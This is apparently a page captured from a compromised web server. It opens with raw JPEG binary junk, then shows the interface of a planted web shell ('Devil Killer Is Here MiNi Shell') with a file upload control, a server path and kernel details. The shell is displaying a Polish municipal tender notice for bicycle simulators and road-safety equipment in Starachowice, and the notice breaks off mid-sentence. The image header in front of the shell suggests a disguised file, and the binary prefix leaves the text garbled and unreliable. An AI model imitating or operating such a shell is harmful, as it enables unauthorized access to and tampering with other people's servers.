JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230518/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230518/0022157401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa mobilnych miasteczek rowerowych, symulatorów rowerów, trenażerów czasu reakcji oraz symulatora przejścia dla pieszych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Starachowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009892</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Radomska 45</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starachowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@starachowice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://starachowice.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa mobilnych miasteczek rowerowych, symulatorów rowerów, trenażerów czasu reakcji oraz symulatora przejścia dla pieszych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-770f1563-f4ad-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00221574</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00031531/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa i montaż 5 mobilnych miasteczek rowerowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Zwiększenie bezpieczeństwa na przejściach dla pieszych oraz doposażenie szkół w narzędzia edukacyjne z zakresu ruchu drogowego w Gminie Starachowice” współfinansowanego ze środków Programu Operacyjnego Infrastruktura i Środowisko 2014-2020 Oś priorytetowa III Rozwój sieci drogowej TEN-T i transportu multimodalnego... </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-770f1563-f4ad-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia na część I-III komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>- Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl<br/>- poczty elektronicznej: zamowienia@starachowice.eu (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego<br/>musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe<br/>informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy<br/>e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone<br/>w zakładce „Centrum Pomocy”:<br/>instrukcje interaktywne https://ezamowienia.gov.pl/pl/instrukcje/<br/>filmy edukacyjne https://ezamowienia.gov.pl/filmy/<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne. Przeglądanie i pobieranie publicznej<br/>treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do<br/>udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie<br/>wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na<br/>Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do<br/>zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie<br/>tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie<br/>wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji<br/>umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj<br/>załącznik”).<br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po<br/>zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji”<br/>wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego<br/>formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług<br/>Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin<br/>Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy<br/>e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod<br/>numerem telefonu (22) 458-77-99 lub drogą elektroniczną poprzez formularz udostępniony<br/>na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@starachowice.eu (UWAGA! Nie dotyczy składania ofert/wniosków<br/>o dopuszczenie do udziału w postępowaniu).<br/>Za datę przekazania oferty, wniosków, zawiadomień, oświadczeń lub oraz innych dokumentów<br/>i informacji przyjmuje się datę ich przekazania na Platformę e-Zamówienia lub datę i godzinę<br/>wpływu na serwer pocztowy Zamawiającego.<br/>Szczegółowe informacje na temat komunikacji w postępowaniu określa instrukcja<br/>interaktywna „Komunikacja w postępowaniu” , która jest dostępna na Platformie<br/>e-Zamówienia pod adresem:<br/>https://ezamowienia.gov.pl/pl/instrukcje-interaktywn_category/dla-wykonawcy/<br/>Ofertę należy złożyć przez Platformę e-Zamówienia, zgodnie z instrukcją interaktywną „Oferty, wnioski i prace konkursowe”, która<br/>jest dostępna pod adresem:<br/>https://ezamowienia.gov.pl/pl/instrukcje-interaktywn_category/dla-wykonawcy/ (więcej w pkt. 12 SWZ)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>administratorem Pani/Pana danych osobowych jest Urząd Miejski w Starachowicach,<br/>ul. Radomska 45, 27-200 Starachowice, tel. (41) 273-82-75.<br/>inspektorem ochrony danych osobowych w Urzędzie Miejskim w Starachowicach jest Pan Wojciech Gawęcki; e-mail: wojciech.gawecki@starachowice.eu <br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Dostawa mobilnych miasteczek rowerowych, symulatorów rowerów, trenażerów czasu reakcji oraz symulatora przejścia dla pieszych”.<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz 74 ustawy z dnia<br/>11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”; <br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 10 lat od dnia zakończenia postępowania o udzielenie zamówienia, (jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy);<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 4 ustawy Pzp Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy Prawo zamówień publicznych:<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą.<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.18.2023.SD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - Symulator roweru.<br/>Zadanie realizowane jest w ramach projektu: „Zwiększenie bezpieczeństwa na przejściach dla pieszych<br/>oraz doposażenie szkół w narzędzia edukacyjne z zakresu ruchu drogowego w Gminie Starachowice” współfinansowanego ze środków Programu Operacyjnego Infrastruktura i Środowisko 2014-2020 Oś priorytetowa III Rozwój sieci drogowej TEN-T i transportu multimodalnego, Działanie 3.1. Rozwój drogowej i lotniczej sieci TEN-T, konkurs nr POIiŚ.3.1/1/22 „Bezpieczny pieszy – doposażenie przejść dla pieszych i doposażenie szkół w zakresie edukacji komunikacyjnej.<br/>Szczegółowy opis sprzętu na każdą część zamówienia, jego ilość oraz miejsce, do którego należy dostarczyć sprzęt zawiera opis przedmiotu zamówienia, stanowiący załącznik nr 1 do SWZ.<br/>Zamawiający wymaga aby oferowany sprzęt stanowiący przedmiot niniejszego zamówienia<br/>był:<br/>a) produktami o wysokiej jakości, spełniającymi obowiązujące normy oraz wymagania<br/>Zamawiającego;<br/>b) fabrycznie nowy, nigdy wcześniej nie używany, nie dotknięty żadną wadą fizyczną, wolny<br/>od obciążeń prawami osób trzecich;<br/>c) kompletny wraz z potrzebnymi do działania przewodami, z odpowiednim<br/>oprogramowaniem oraz nie wymagał żadnych dodatkowych nakładów i był gotowy do<br/>pracy;<br/>d) zgodny z normami bezpieczeństwa (posiadał deklarację CE) oraz posiadał wymagane<br/>prawem atesty i certyfikaty jak również niezbędne instrukcje i materiały dotyczące<br/>użytkowania w języku polskim.<br/>Dostarczony danego rodzaju sprzęt w więcej niż jednym egzemplarzu musi pochodzić od<br/>jednego producenta. Na dostarczony sprzęt Wykonawca udzieli gwarancji na minimalny okres<br/>30 miesięcy, maksymalny okres 60 miesięcy. Liczony od daty odbioru całkowitego, niezależnie<br/>od długości gwarancji udzielonej przez producenta.<br/>Wykonawca w cenie oferty musi uwzględnić wszystkie koszty związane z wykonaniem<br/>przedmiotu zmówienia, a w szczególności koszty dostarczenia, załadunku, rozładunku,<br/>montażu w wyznaczonych pomieszczeniach, sprawdzenia funkcjonalności sprzętu (pierwsze<br/>uruchomienie) oraz zapewni przeszkolenie w zakresie funkcji i obsługi zakupionego sprzętu.<br/>Zamawiający wymaga, aby Wykonawca był uprawniony do wprowadzania do obrotu<br/>wszelkiego oprogramowania wchodzącego w skład przedmiotu zamówienia.<br/>Szczegółowe warunki dostawy, gwarancji, sposób zapłaty za dostarczony sprzęt i obowiązki<br/>stron zawiera wzór umowy stanowiący załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 86680,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34430000-0 - Rowery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która otrzyma największą łączną ilość punktów w oparciu o ustalone kryteria, zostanie<br/>uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością<br/>uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II - Trenażer czasu reakcji<br/>Zadanie<br/>realizowane jest w ramach projektu: „Zwiększenie bezpieczeństwa na przejściach dla pieszych<br/>oraz doposażenie szkół w narzędzia edukacyjne z zakresu ruchu drogowego w Gminie<br/>Starachowice” współfinansowanego ze środków Programu Operacyjnego Infrastruktura<br/>i Środowisko 2014-2020 Oś priorytetowa III Rozwój sieci drogowej TEN-T i transportu<br/>multimodalnego, Działanie 3.1. Rozwój drogowej i lotniczej sieci TEN-T, konkurs<br/>nr POIiŚ.3.1/1/22 „Bezpieczny pieszy – doposażenie przejść dla pieszych i doposażenie szkół<br/>w zakresie edukacji komunikacyjnej.<br/>Szczegółowy opis sprzętu na każdą część zamówienia, jego ilość oraz miejsce, do którego<br/>należy dostarczyć sprzęt zawiera opis przedmiotu zamówienia, stanowiący załącznik nr 1 do<br/>SWZ.<br/>Zamawiający wymaga aby oferowany sprzęt stanowiący przedmiot niniejszego zamówienia<br/>był:<br/>a) produktami o wysokiej jakości, spełniającymi obowiązujące normy oraz wymagania<br/>Zamawiającego;<br/>b) fabrycznie nowy, nigdy wcześniej nie używany, nie dotknięty żadną wadą fizyczną, wolny<br/>od obciążeń prawami osób trzecich;<br/>c) kompletny wraz z potrzebnymi do działania przewodami, z odpowiednim<br/>oprogramowaniem oraz nie wymagał żadnych dodatkowych nakładów i był gotowy do<br/>pracy;<br/>d) zgodny z normami bezpieczeństwa (posiadał deklarację CE) oraz posiadał wymagane<br/>prawem atesty i certyfikaty jak również niezbędne instrukcje i materiały dotyczące<br/>użytkowania w języku polskim.<br/>Dostarczony danego rodzaju sprzęt w więcej niż jednym egzemplarzu musi pochodzić od<br/>jednego producenta. Na dostarczony sprzęt Wykonawca udzieli gwarancji na minimalny okres<br/>30 miesięcy, maksymalny okres 60 miesięcy. Liczony od daty odbioru całkowitego, niezależnie<br/>od długości gwarancji udzielonej przez producenta.<br/>Wykonawca w cenie oferty musi uwzględnić wszystkie koszty związane z wykonaniem<br/>przedmiotu zmówienia, a w szczególności koszty dostarczenia, załadunku, rozładunku,<br/>montażu w wyznaczonych pomieszczeniach, sprawdzenia funkcjonalności sprzętu (pierwsze<br/>uruchomienie) oraz zapewni przeszkolenie w zakresie funkcji i obsługi zakupionego sprzętu.<br/>Zamawiający wymaga, aby Wykonawca był uprawniony do wprowadzania do obrotu<br/>wszelkiego oprogramowania wchodzącego w skład przedmiotu zamówienia.<br/>Szczegółowe warunki dostawy, gwarancji, sposób zapłaty za dostarczony sprzęt i obowiązki<br/>stron zawiera wzór umowy stanowiący załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15782,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która otrzyma największą łączną ilość punktów w oparciu o ustalone kryteria, zostanie<br/>uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością<br/>uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III - Symulator przejścia dla pieszych.<br/>Zadanie<br/>realizowane jest w ramach projektu: „Zwiększenie bezpieczeństwa na przejściach dla pieszych<br/>oraz doposażenie szkół w narzędzia edukacyjne z zakresu ruchu drogowego w Gminie<br/>Starachowice” współfinansowanego ze środków Programu Operacyjnego Infrastruktura<br/>i Środowisko 2014-2020 Oś priorytetowa III Rozwój sieci drogowej TEN-T i transportu<br/>multimodalnego, Działanie 3.1. Rozwój drogowej i lotniczej sieci TEN-T, konkurs<br/>nr POIiŚ.3.1/1/22 „Bezpieczny 